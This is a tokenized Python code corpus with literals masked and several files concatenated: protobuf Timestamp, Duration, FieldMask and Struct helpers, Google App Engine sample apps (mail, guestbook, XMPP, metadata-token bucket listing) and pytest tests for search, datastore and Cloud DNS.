<EOL> '<STR_LIT>' ) <EOL> time_value = value [ <NUM_LIT:0> : timezone_offset ] <EOL> point_position = time_value . find ( '<STR_LIT:.>' ) <EOL> if point_position == - <NUM_LIT:1> : <EOL> second_value = time_value <EOL> nano_value = '<STR_LIT>' <EOL> else : <EOL> second_value = time_value [ : point_position ] <EOL> nano_value = time_value [ point_position + <NUM_LIT:1> : ] <EOL> date_object = datetime . strptime ( second_value , _TIMESTAMPFOMAT ) <EOL> td = date_object - datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> seconds = td . seconds + td . days * _SECONDS_PER_DAY <EOL> if len ( nano_value ) > <NUM_LIT:9> : <EOL> raise ParseError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( nano_value ) ) <EOL> if nano_value : <EOL> nanos = round ( float ( '<STR_LIT>' + nano_value ) * <NUM_LIT> ) <EOL> else : <EOL> nanos = <NUM_LIT:0> <EOL> if value [ timezone_offset ] == '<STR_LIT>' : <EOL> if len ( value ) != timezone_offset + <NUM_LIT:1> : <EOL> raise ParseError ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( value ) ) <EOL> else : <EOL> timezone = value [ timezone_offset : ] <EOL> pos = timezone . find ( '<STR_LIT::>' ) <EOL> if pos == - <NUM_LIT:1> : <EOL> raise ParseError ( <EOL> '<STR_LIT>' . format ( timezone ) ) <EOL> if timezone [ <NUM_LIT:0> ] == '<STR_LIT:+>' : <EOL> seconds -= ( int ( timezone [ <NUM_LIT:1> : pos ] ) * <NUM_LIT> + int ( timezone [ pos + <NUM_LIT:1> : ] ) ) * <NUM_LIT> <EOL> else : <EOL> seconds += ( int ( timezone [ <NUM_LIT:1> : pos ] ) * <NUM_LIT> + int ( timezone [ pos + <NUM_LIT:1> : ] ) ) * <NUM_LIT> <EOL> self . seconds = int ( seconds ) <EOL> self . nanos = int ( nanos ) <EOL> def GetCurrentTime ( self ) : <EOL> """<STR_LIT>""" <EOL> self . FromDatetime ( datetime . utcnow ( ) ) <EOL> def ToNanoseconds ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . seconds * _NANOS_PER_SECOND + self . nanos <EOL> def ToMicroseconds ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . seconds * _MICROS_PER_SECOND + <EOL> self . nanos // _NANOS_PER_MICROSECOND ) <EOL> def ToMilliseconds ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . seconds * _MILLIS_PER_SECOND + <EOL> self . nanos // _NANOS_PER_MILLISECOND ) <EOL> def ToSeconds ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . seconds <EOL> def FromNanoseconds ( self , nanos ) : <EOL> """<STR_LIT>""" <EOL> self . seconds = nanos // _NANOS_PER_SECOND <EOL> self . nanos = nanos % _NANOS_PER_SECOND <EOL> def FromMicroseconds ( self , micros ) : <EOL> """<STR_LIT>""" <EOL> self . seconds = micros // _MICROS_PER_SECOND <EOL> self . nanos = ( micros % _MICROS_PER_SECOND ) * _NANOS_PER_MICROSECOND <EOL> def FromMilliseconds ( self , millis ) : <EOL> """<STR_LIT>""" <EOL> self . seconds = millis // _MILLIS_PER_SECOND <EOL> self . nanos = ( millis % _MILLIS_PER_SECOND ) * _NANOS_PER_MILLISECOND <EOL> def FromSeconds ( self , seconds ) : <EOL> """<STR_LIT>""" <EOL> self . seconds = seconds <EOL> self . nanos = <NUM_LIT:0> <EOL> def ToDatetime ( self ) : <EOL> """<STR_LIT>""" <EOL> return datetime . utcfromtimestamp ( <EOL> self . seconds + self . nanos / float ( _NANOS_PER_SECOND ) ) <EOL> def FromDatetime ( self , dt ) : <EOL> """<STR_LIT>""" <EOL> td = dt - datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> self . seconds = td . seconds + td . days * _SECONDS_PER_DAY <EOL> self . nanos = td . microseconds * _NANOS_PER_MICROSECOND <EOL> class Duration ( object ) : <EOL> """<STR_LIT>""" <EOL> def ToJsonString ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . seconds < <NUM_LIT:0> or self . nanos < <NUM_LIT:0> : <EOL> result = '<STR_LIT:->' <EOL> seconds = - self . seconds + int ( ( <NUM_LIT:0> - self . nanos ) // <NUM_LIT> ) <EOL> nanos = ( <NUM_LIT:0> - self . nanos ) % <NUM_LIT> <EOL> else : <EOL> result = '<STR_LIT>' <EOL> seconds = self . seconds + int ( self . nanos // <NUM_LIT> ) <EOL> nanos = self . nanos % <NUM_LIT> <EOL> result += '<STR_LIT>' % seconds <EOL> if ( nanos % <NUM_LIT> ) == <NUM_LIT:0> : <EOL> return result + '<STR_LIT:s>' <EOL> if ( nanos % <NUM_LIT> ) == <NUM_LIT:0> : <EOL> return result + '<STR_LIT>' % ( nanos / <NUM_LIT> ) <EOL> if ( nanos % <NUM_LIT> ) == <NUM_LIT:0> : <EOL> return result + '<STR_LIT>' % ( nanos / <NUM_LIT> ) <EOL> return result + '<STR_LIT>' % nanos <EOL> def FromJsonString ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if len ( value ) < <NUM_LIT:1> or value [ - <NUM_LIT:1> ] != '<STR_LIT:s>' : <EOL> raise ParseError ( <EOL> '<STR_LIT>' . format ( value ) ) <EOL> try : <EOL> pos = value . find ( '<STR_LIT:.>' ) <EOL> if pos == - <NUM_LIT:1> : <EOL> self . seconds = int ( value [ : - <NUM_LIT:1> ] ) <EOL> self . nanos = <NUM_LIT:0> <EOL> else : <EOL> self . seconds = int ( value [ : pos ] ) <EOL> if value [ <NUM_LIT:0> ] == '<STR_LIT:->' : <EOL> self . nanos = int ( round ( float ( '<STR_LIT>' . format ( value [ pos : - <NUM_LIT:1> ] ) ) * <NUM_LIT> ) ) <EOL> else : <EOL> self . nanos = int ( round ( float ( '<STR_LIT>' . format ( value [ pos : - <NUM_LIT:1> ] ) ) * <NUM_LIT> ) ) <EOL> except ValueError : <EOL> raise ParseError ( <EOL> '<STR_LIT>' . format ( value ) ) <EOL> def ToNanoseconds ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . seconds * _NANOS_PER_SECOND + self . nanos <EOL> def ToMicroseconds ( self ) : <EOL> """<STR_LIT>""" <EOL> micros = _RoundTowardZero ( self . nanos , _NANOS_PER_MICROSECOND ) <EOL> return self . seconds * _MICROS_PER_SECOND + micros <EOL> def ToMilliseconds ( self ) : <EOL> """<STR_LIT>""" <EOL> millis = _RoundTowardZero ( self . nanos , _NANOS_PER_MILLISECOND ) <EOL> return self . seconds * _MILLIS_PER_SECOND + millis <EOL> def ToSeconds ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . seconds <EOL> def FromNanoseconds ( self , nanos ) : <EOL> """<STR_LIT>""" <EOL> self . _NormalizeDuration ( nanos // _NANOS_PER_SECOND , <EOL> nanos % _NANOS_PER_SECOND ) <EOL> def FromMicroseconds ( self , micros ) : <EOL> """<STR_LIT>""" <EOL> self . _NormalizeDuration ( <EOL> micros // _MICROS_PER_SECOND , <EOL> ( micros % _MICROS_PER_SECOND ) * _NANOS_PER_MICROSECOND ) <EOL> def FromMilliseconds ( self , millis ) : <EOL> """<STR_LIT>""" <EOL> self . _NormalizeDuration ( <EOL> millis // _MILLIS_PER_SECOND , <EOL> ( millis % _MILLIS_PER_SECOND ) * _NANOS_PER_MILLISECOND ) <EOL> def FromSeconds ( self , seconds ) : <EOL> """<STR_LIT>""" <EOL> self . seconds = seconds <EOL> self . nanos = <NUM_LIT:0> <EOL> def ToTimedelta ( self ) : <EOL> """<STR_LIT>""" <EOL> return timedelta ( <EOL> seconds = self . seconds , microseconds = _RoundTowardZero ( <EOL> self . nanos , _NANOS_PER_MICROSECOND ) ) <EOL> def FromTimedelta ( self , td ) : <EOL> """<STR_LIT>""" <EOL> self . _NormalizeDuration ( td . seconds + td . days * _SECONDS_PER_DAY , <EOL> td . microseconds * _NANOS_PER_MICROSECOND ) <EOL> def _NormalizeDuration ( self , seconds , nanos ) : <EOL> """<STR_LIT>""" <EOL> if seconds < <NUM_LIT:0> and nanos > <NUM_LIT:0> : <EOL> seconds += <NUM_LIT:1> <EOL> nanos -= _NANOS_PER_SECOND <EOL> self . seconds = seconds <EOL> self . nanos = nanos <EOL> def _RoundTowardZero ( value , divider ) : <EOL> """<STR_LIT>""" <EOL> result = value // divider <EOL> remainder = value % divider <EOL> if result < <NUM_LIT:0> and remainder > <NUM_LIT:0> : <EOL> return result + <NUM_LIT:1> <EOL> else : <EOL> return result <EOL> class FieldMask ( object ) : <EOL> """<STR_LIT>""" <EOL> def ToJsonString ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT:U+002C>' . join ( self . paths ) <EOL> def FromJsonString ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . Clear ( ) <EOL> for path in value . split ( '<STR_LIT:U+002C>' ) : <EOL> self . paths . append ( path ) <EOL> def IsValidForDescriptor ( self , message_descriptor ) : <EOL> """<STR_LIT>""" <EOL> for path in self . paths : <EOL> if not _IsValidPath ( message_descriptor , path ) : <EOL> return False <EOL> return True <EOL> def AllFieldsFromDescriptor ( self , message_descriptor ) : <EOL> """<STR_LIT>""" <EOL> self . Clear ( ) <EOL> for field in message_descriptor . fields : <EOL> self . paths . append ( field . name ) <EOL> def CanonicalFormFromMask ( self , mask ) : <EOL> """<STR_LIT>""" <EOL> tree = _FieldMaskTree ( mask ) <EOL> tree . ToFieldMask ( self ) <EOL> def Union ( self , mask1 , mask2 ) : <EOL> """<STR_LIT>""" <EOL> _CheckFieldMaskMessage ( mask1 ) <EOL> _CheckFieldMaskMessage ( mask2 ) <EOL> tree = _FieldMaskTree ( mask1 ) <EOL> tree . MergeFromFieldMask ( mask2 ) <EOL> tree . ToFieldMask ( self ) <EOL> def Intersect ( self , mask1 , mask2 ) : <EOL> """<STR_LIT>""" <EOL> _CheckFieldMaskMessage ( mask1 ) <EOL> _CheckFieldMaskMessage ( mask2 ) <EOL> tree = _FieldMaskTree ( mask1 ) <EOL> intersection = _FieldMaskTree ( ) <EOL> for path in mask2 . paths : <EOL> tree . IntersectPath ( path , intersection ) <EOL> intersection . ToFieldMask ( self ) <EOL> def MergeMessage ( <EOL> self , source , destination , <EOL> replace_message_field = False , replace_repeated_field = False ) : <EOL> """<STR_LIT>""" <EOL> tree = _FieldMaskTree ( self ) <EOL> tree . MergeMessage ( <EOL> source , destination , replace_message_field , replace_repeated_field ) <EOL> def _IsValidPath ( message_descriptor , path ) : <EOL> """<STR_LIT>""" <EOL> parts = path . split ( '<STR_LIT:.>' ) <EOL> last = parts . pop ( ) <EOL> for name in parts : <EOL> field = message_descriptor . fields_by_name [ name ] <EOL> if ( field is None or <EOL> field . label == FieldDescriptor . LABEL_REPEATED or <EOL> field . type != FieldDescriptor . TYPE_MESSAGE ) : <EOL> return False <EOL> message_descriptor = field . message_type <EOL> return last in message_descriptor . fields_by_name <EOL> def _CheckFieldMaskMessage ( message ) : <EOL> """<STR_LIT>""" <EOL> message_descriptor = message . DESCRIPTOR <EOL> if ( message_descriptor . name != '<STR_LIT>' or <EOL> message_descriptor . file . name != '<STR_LIT>' ) : <EOL> raise ValueError ( '<STR_LIT>' . format ( <EOL> message_descriptor . full_name ) ) <EOL> class _FieldMaskTree ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , field_mask = None ) : <EOL> """<STR_LIT>""" <EOL> self . _root = { } <EOL> if field_mask : <EOL> self . MergeFromFieldMask ( field_mask ) <EOL> def MergeFromFieldMask ( self , field_mask ) : <EOL> """<STR_LIT>""" <EOL> for path in field_mask . paths : <EOL> self . AddPath ( path ) <EOL> def AddPath ( self , path ) : <EOL> """<STR_LIT>""" <EOL> node = self . _root <EOL> for name in path . split ( '<STR_LIT:.>' ) : <EOL> if name not in node : <EOL> node [ name ] = { } <EOL> elif not node [ name ] : <EOL> return <EOL> node = node [ name ] <EOL> node . clear ( ) <EOL> def ToFieldMask ( self , field_mask ) : <EOL> """<STR_LIT>""" <EOL> field_mask . Clear ( ) <EOL> _AddFieldPaths ( self . _root , '<STR_LIT>' , field_mask ) <EOL> def IntersectPath ( self , path , intersection ) : <EOL> """<STR_LIT>""" <EOL> node = self . _root <EOL> for name in path . split ( '<STR_LIT:.>' ) : <EOL> if name not in node : <EOL> return <EOL> elif not node [ name ] : <EOL> intersection . AddPath ( path ) <EOL> return <EOL> node = node [ name ] <EOL> intersection . AddLeafNodes ( path , node ) <EOL> def AddLeafNodes ( self , prefix , node ) : <EOL> """<STR_LIT>""" <EOL> if not node : <EOL> self . AddPath ( prefix ) <EOL> for name in node : <EOL> child_path = prefix + '<STR_LIT:.>' + name <EOL> self . AddLeafNodes ( child_path , node [ name ] ) <EOL> def MergeMessage ( <EOL> self , source , destination , <EOL> replace_message , replace_repeated ) : <EOL> """<STR_LIT>""" <EOL> _MergeMessage ( <EOL> self . _root , source , destination , replace_message , replace_repeated ) <EOL> def _StrConvert ( value ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( value , str ) : <EOL> return value . encode ( '<STR_LIT:utf-8>' ) <EOL> return value <EOL> def _MergeMessage ( <EOL> node , source , destination , replace_message , replace_repeated ) : <EOL> """<STR_LIT>""" <EOL> source_descriptor = source . DESCRIPTOR <EOL> for name in node : <EOL> child = node [ name ] <EOL> field = source_descriptor . fields_by_name [ name ] <EOL> if field is None : <EOL> raise ValueError ( '<STR_LIT>' . format ( <EOL> name , source_descriptor . full_name ) ) <EOL> if child : <EOL> if ( field . label == FieldDescriptor . LABEL_REPEATED or <EOL> field . cpp_type != FieldDescriptor . CPPTYPE_MESSAGE ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> name , source_descriptor . full_name ) ) <EOL> _MergeMessage ( <EOL> child , getattr ( source , name ) , getattr ( destination , name ) , <EOL> replace_message , replace_repeated ) <EOL> continue <EOL> if field . label == FieldDescriptor . LABEL_REPEATED : <EOL> if replace_repeated : <EOL> destination . ClearField ( _StrConvert ( name ) ) <EOL> repeated_source = getattr ( source , name ) <EOL> repeated_destination = getattr ( destination , name ) <EOL> if field . cpp_type == FieldDescriptor . CPPTYPE_MESSAGE : <EOL> for item in repeated_source : <EOL> repeated_destination . add ( ) . MergeFrom ( item ) <EOL> else : <EOL> repeated_destination . extend ( repeated_source ) <EOL> else : <EOL> if field . cpp_type == FieldDescriptor . CPPTYPE_MESSAGE : <EOL> if replace_message : <EOL> destination . ClearField ( _StrConvert ( name ) ) <EOL> if source . HasField ( name ) : <EOL> getattr ( destination , name ) . MergeFrom ( getattr ( source , name ) ) <EOL> else : <EOL> setattr ( destination , name , getattr ( source , name ) ) <EOL> def _AddFieldPaths ( node , prefix , field_mask ) : <EOL> """<STR_LIT>""" <EOL> if not node : <EOL> field_mask . paths . append ( prefix ) <EOL> return <EOL> for name in sorted ( node ) : <EOL> if prefix : <EOL> child_path = prefix + '<STR_LIT:.>' + name <EOL> else : <EOL> child_path = name <EOL> _AddFieldPaths ( node [ name ] , child_path , field_mask ) <EOL> _INT_OR_FLOAT = six . integer_types + ( float , ) <EOL> def _SetStructValue ( struct_value , value ) : <EOL> if value is None : <EOL> struct_value . null_value = <NUM_LIT:0> <EOL> elif isinstance ( value , bool ) : <EOL> struct_value . bool_value = value <EOL> elif isinstance ( value , six . string_types ) : <EOL> struct_value . string_value = value <EOL> elif isinstance ( value , _INT_OR_FLOAT ) : <EOL> struct_value . number_value = value <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def _GetStructValue ( struct_value ) : <EOL> which = struct_value . WhichOneof ( '<STR_LIT>' ) <EOL> if which == '<STR_LIT>' : <EOL> return struct_value . struct_value <EOL> elif which == '<STR_LIT>' : <EOL> return None <EOL> elif which == '<STR_LIT>' : <EOL> return struct_value . number_value <EOL> elif which == '<STR_LIT>' : <EOL> return struct_value . string_value <EOL> elif which == '<STR_LIT>' : <EOL> return struct_value . bool_value <EOL> elif which == '<STR_LIT>' : <EOL> return struct_value . list_value <EOL> elif which is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> class Struct ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ ] <EOL> def __getitem__ ( self , key ) : <EOL> return _GetStructValue ( self . fields [ key ] ) <EOL> def __setitem__ ( self , key , value ) : <EOL> _SetStructValue ( self . fields [ key ] , value ) <EOL> def get_or_create_list ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self . fields [ key ] . list_value <EOL> def get_or_create_struct ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self . fields [ key ] . struct_value <EOL> class ListValue ( object ) : <EOL> """<STR_LIT>""" <EOL> def __len__ ( self ) : <EOL> return len ( self . values ) <EOL> def append ( self , value ) : <EOL> _SetStructValue ( self . values . add ( ) , value ) <EOL> def extend ( self , elem_seq ) : <EOL> for value in elem_seq : <EOL> self . append ( value ) <EOL> def __getitem__ ( self , index ) : <EOL> """<STR_LIT>""" <EOL> return _GetStructValue ( self . values . __getitem__ ( index ) ) <EOL> def __setitem__ ( self , index , value ) : <EOL> _SetStructValue ( self . values . __getitem__ ( index ) , value ) <EOL> def items ( self ) : <EOL> for i in range ( len ( self ) ) : <EOL> yield self [ i ] <EOL> def add_struct ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . values . add ( ) . struct_value <EOL> def add_list ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . values . add ( ) . list_value <EOL> WKTBASES = { <EOL> '<STR_LIT>' : Any , <EOL> '<STR_LIT>' : Duration , <EOL> '<STR_LIT>' : FieldMask , <EOL> '<STR_LIT>' : ListValue , <EOL> '<STR_LIT>' : Struct , <EOL> '<STR_LIT>' : Timestamp , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> sys . stderr . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if not hasattr ( sys , '<STR_LIT>' ) : <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> version_tuple = tuple ( sys . version_info [ : <NUM_LIT:2> ] ) <EOL> if version_tuple < ( <NUM_LIT:2> , <NUM_LIT:4> ) : <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' % version_tuple ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if version_tuple == ( <NUM_LIT:2> , <NUM_LIT:4> ) : <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> BULKLOAD_CLIENT_PATH = '<STR_LIT>' <EOL> DIR_PATH = os . path . abspath ( os . path . dirname ( <EOL> os . path . dirname ( os . path . realpath ( __file__ ) ) ) ) <EOL> EXTRA_PATHS = [ <EOL> DIR_PATH , <EOL> os . path . join ( DIR_PATH , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> os . path . join ( DIR_PATH , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> os . path . join ( DIR_PATH , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . path = EXTRA_PATHS + sys . path <EOL> script_path = os . path . join ( DIR_PATH , BULKLOAD_CLIENT_PATH ) <EOL> execfile ( script_path , globals ( ) ) </s>
<s> from google . appengine . api import search <EOL> import pytest <EOL> @ pytest . fixture <EOL> def index ( ) : <EOL> index = search . Index ( name = '<STR_LIT>' , namespace = '<STR_LIT>' ) <EOL> doc = search . Document ( <EOL> doc_id = '<STR_LIT>' , <EOL> fields = [ <EOL> search . TextField ( <EOL> name = '<STR_LIT:body>' , <EOL> value = '<STR_LIT>' ) , <EOL> ] ) <EOL> index . put ( doc ) <EOL> return index <EOL> def test_basic_search ( index ) : <EOL> resp = index . search ( '<STR_LIT:hello>' ) <EOL> assert len ( resp . results ) == <NUM_LIT:1> <EOL> result = resp . results [ <NUM_LIT:0> ] <EOL> assert result . doc_id == '<STR_LIT>' <EOL> assert result . language == '<STR_LIT>' <EOL> assert result . fields [ <NUM_LIT:0> ] . value == '<STR_LIT>' <EOL> assert result . fields [ <NUM_LIT:0> ] . name == '<STR_LIT:body>' </s>
<s> import main <EOL> def test_shelves ( testbed ) : <EOL> api = main . Shelves ( ) <EOL> response = api . list ( main . Request ( ) ) <EOL> assert response <EOL> def test_books ( testbed ) : <EOL> api = main . Books ( ) <EOL> response = api . bookmark ( main . Request ( ) ) <EOL> assert response </s>
<s> from google . appengine . api import app_identity <EOL> from google . appengine . api import mail <EOL> import webapp2 <EOL> def send_approved_mail ( sender_address ) : <EOL> mail . send_mail ( sender = sender_address , <EOL> to = "<STR_LIT>" , <EOL> subject = "<STR_LIT>" , <EOL> body = """<STR_LIT>""" ) <EOL> class SendMailHandler ( webapp2 . RequestHandler ) : <EOL> def get ( self ) : <EOL> send_approved_mail ( '<STR_LIT>' . format ( <EOL> app_identity . get_application_id ( ) ) ) <EOL> self . response . content_type = '<STR_LIT>' <EOL> self . response . write ( '<STR_LIT>' ) <EOL> app = webapp2 . WSGIApplication ( [ <EOL> ( '<STR_LIT>' , SendMailHandler ) , <EOL> ] , debug = True ) </s>
<s> import datastore <EOL> import webtest <EOL> def test_datastore ( testbed ) : <EOL> app = webtest . TestApp ( datastore . app ) <EOL> response = app . get ( '<STR_LIT>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert '<STR_LIT>' in response . body <EOL> response = app . get ( '<STR_LIT>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert '<STR_LIT>' in response . body <EOL> assert '<STR_LIT>' in response . body <EOL> response = app . get ( '<STR_LIT>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert '<STR_LIT>' in response . body <EOL> assert '<STR_LIT>' in response . body </s>
<s> import cgi <EOL> from google . appengine . datastore . datastore_query import Cursor <EOL> from google . appengine . ext import ndb <EOL> import webapp2 <EOL> class Greeting ( ndb . Model ) : <EOL> """<STR_LIT>""" <EOL> content = ndb . StringProperty ( ) <EOL> date = ndb . DateTimeProperty ( auto_now_add = True ) <EOL> @ classmethod <EOL> def query_book ( cls , ancestor_key ) : <EOL> return cls . query ( ancestor = ancestor_key ) . order ( - cls . date ) <EOL> class MainPage ( webapp2 . RequestHandler ) : <EOL> GREETINGS_PER_PAGE = <NUM_LIT:20> <EOL> def get ( self ) : <EOL> guestbook_name = self . request . get ( '<STR_LIT>' ) <EOL> ancestor_key = ndb . Key ( '<STR_LIT>' , guestbook_name or '<STR_LIT>' ) <EOL> greetings = Greeting . query_book ( ancestor_key ) . fetch ( <EOL> self . GREETINGS_PER_PAGE ) <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> for greeting in greetings : <EOL> self . response . out . write ( <EOL> '<STR_LIT>' % cgi . escape ( greeting . content ) ) <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> class List ( webapp2 . RequestHandler ) : <EOL> GREETINGS_PER_PAGE = <NUM_LIT:10> <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> cursor = Cursor ( urlsafe = self . request . get ( '<STR_LIT>' ) ) <EOL> greets , next_cursor , more = Greeting . query ( ) . fetch_page ( <EOL> self . GREETINGS_PER_PAGE , start_cursor = cursor ) <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> for greeting in greets : <EOL> self . response . out . write ( <EOL> '<STR_LIT>' % cgi . escape ( greeting . content ) ) <EOL> if more and next_cursor : <EOL> self . response . out . write ( '<STR_LIT>' % <EOL> next_cursor . urlsafe ( ) ) <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> app = webapp2 . WSGIApplication ( [ <EOL> ( '<STR_LIT:/>' , MainPage ) , <EOL> ( '<STR_LIT>' , List ) , <EOL> ] , debug = True ) </s>
<s> import logging <EOL> from google . appengine . api import xmpp <EOL> import mock <EOL> import webapp2 <EOL> roster = mock . Mock ( ) <EOL> class SubscribeHandler ( webapp2 . RequestHandler ) : <EOL> def post ( self ) : <EOL> sender = self . request . get ( '<STR_LIT>' ) . split ( '<STR_LIT:/>' ) [ <NUM_LIT:0> ] <EOL> roster . add_contact ( sender ) <EOL> class PresenceHandler ( webapp2 . RequestHandler ) : <EOL> def post ( self ) : <EOL> sender = self . request . get ( '<STR_LIT>' ) . split ( '<STR_LIT:/>' ) [ <NUM_LIT:0> ] <EOL> xmpp . send_presence ( sender , status = self . request . get ( '<STR_LIT:status>' ) , <EOL> presence_show = self . request . get ( '<STR_LIT>' ) ) <EOL> class SendPresenceHandler ( webapp2 . RequestHandler ) : <EOL> def post ( self ) : <EOL> jid = self . request . get ( '<STR_LIT>' ) <EOL> xmpp . send_presence ( jid , status = "<STR_LIT>" ) <EOL> class ErrorHandler ( webapp2 . RequestHandler ) : <EOL> def post ( self ) : <EOL> error_sender = self . request . get ( '<STR_LIT>' ) <EOL> error_stanza = self . request . get ( '<STR_LIT>' ) <EOL> logging . error ( '<STR_LIT>' <EOL> . format ( error_sender , error_stanza ) ) <EOL> class SendChatHandler ( webapp2 . RequestHandler ) : <EOL> def post ( self ) : <EOL> user_address = '<STR_LIT>' <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> status_code = xmpp . send_message ( user_address , msg ) <EOL> chat_message_sent = ( status_code == xmpp . NO_ERROR ) <EOL> if not chat_message_sent : <EOL> pass <EOL> class XMPPHandler ( webapp2 . RequestHandler ) : <EOL> def post ( self ) : <EOL> message = xmpp . Message ( self . request . POST ) <EOL> if message . body [ <NUM_LIT:0> : <NUM_LIT:5> ] . lower ( ) == '<STR_LIT:hello>' : <EOL> message . reply ( "<STR_LIT>" ) <EOL> app = webapp2 . WSGIApplication ( [ <EOL> ( '<STR_LIT>' , XMPPHandler ) , <EOL> ( '<STR_LIT>' , SubscribeHandler ) , <EOL> ( '<STR_LIT>' , PresenceHandler ) , <EOL> ( '<STR_LIT>' , ErrorHandler ) , <EOL> ( '<STR_LIT>' , SendPresenceHandler ) , <EOL> ( '<STR_LIT>' , SendChatHandler ) , <EOL> ] ) </s>
<s> """<STR_LIT>""" <EOL> import argparse <EOL> import requests <EOL> METADATA_URL = '<STR_LIT>' <EOL> METADATA_HEADERS = { '<STR_LIT>' : '<STR_LIT>' } <EOL> SERVICE_ACCOUNT = '<STR_LIT:default>' <EOL> def get_access_token ( ) : <EOL> url = '<STR_LIT>' . format ( <EOL> METADATA_URL , SERVICE_ACCOUNT ) <EOL> r = requests . get ( url , headers = METADATA_HEADERS ) <EOL> r . raise_for_status ( ) <EOL> access_token = r . json ( ) [ '<STR_LIT>' ] <EOL> return access_token <EOL> def list_buckets ( project_id , access_token ) : <EOL> url = '<STR_LIT>' <EOL> params = { <EOL> '<STR_LIT>' : project_id <EOL> } <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( access_token ) <EOL> } <EOL> r = requests . get ( url , params = params , headers = headers ) <EOL> r . raise_for_status ( ) <EOL> return r . json ( ) <EOL> def main ( project_id ) : <EOL> access_token = get_access_token ( ) <EOL> buckets = list_buckets ( project_id , access_token ) <EOL> print ( buckets ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> parser = argparse . ArgumentParser ( <EOL> description = __doc__ , <EOL> formatter_class = argparse . RawDescriptionHelpFormatter ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> main ( args . project_id ) </s>
<s> from gcloud import dns <EOL> from gcp . testing . flaky import flaky <EOL> import main <EOL> import pytest <EOL> TEST_ZONE_NAME = '<STR_LIT>' <EOL> TEST_ZONE_DNS_NAME = '<STR_LIT>' <EOL> TEST_ZONE_DESCRIPTION = '<STR_LIT>' <EOL> @ pytest . yield_fixture <EOL> def client ( cloud_config ) : <EOL> client = dns . Client ( cloud_config . project ) <EOL> yield client <EOL> for zone in client . list_zones ( ) [ <NUM_LIT:0> ] : <EOL> zone . delete ( ) <EOL> @ pytest . yield_fixture <EOL> def zone ( client , cloud_config ) : <EOL> zone = client . zone ( TEST_ZONE_NAME , TEST_ZONE_DNS_NAME ) <EOL> zone . description = TEST_ZONE_DESCRIPTION <EOL> zone . create ( ) <EOL> yield zone <EOL> if zone . exists ( ) : <EOL> zone . delete ( ) <EOL> @ flaky <EOL> def test_create_zone ( client , cloud_config ) : <EOL> zone = main . create_zone ( <EOL> cloud_config . project , <EOL> TEST_ZONE_NAME , <EOL> TEST_ZONE_DNS_NAME , <EOL> TEST_ZONE_DESCRIPTION ) <EOL> assert zone . name == TEST_ZONE_NAME <EOL> assert zone . dns_name == TEST_ZONE_DNS_NAME <EOL> assert zone . description == TEST_ZONE_DESCRIPTION <EOL> @ flaky <EOL> def test_get_zone ( client , cloud_config , zone ) : <EOL> zone = main . get_zone ( cloud_config . project , TEST_ZONE_NAME ) <EOL> assert zone . name == TEST_ZONE_NAME <EOL> assert zone . dns_name == TEST_ZONE_DNS_NAME <EOL> assert zone . description == TEST_ZONE_DESCRIPTION <EOL> @ flaky <EOL> def test_list_zones ( client , cloud_config , zone ) : <EOL> zones = main . list_zones ( cloud_config . project ) <EOL> assert TEST_ZONE_NAME in zones <EOL> @ flaky <EOL> def test_delete_zone ( client , cloud_config , zone ) : <EOL> main . delete_zone ( cloud_config . project , TEST_ZONE_NAME ) <EOL> @ flaky <EOL> def test_list_resource_records ( client , cloud_config , zone ) : <EOL> records = main . list_resource_records ( cloud_config . project , TEST_ZONE_NAME ) <EOL> assert records <EOL> @ flaky <EOL> def test_list_changes ( client , cloud_config , zone ) : <EOL> changes = main . list_changes ( cloud_config . project , TEST_ZONE_NAME ) <EOL> assert changes </s>
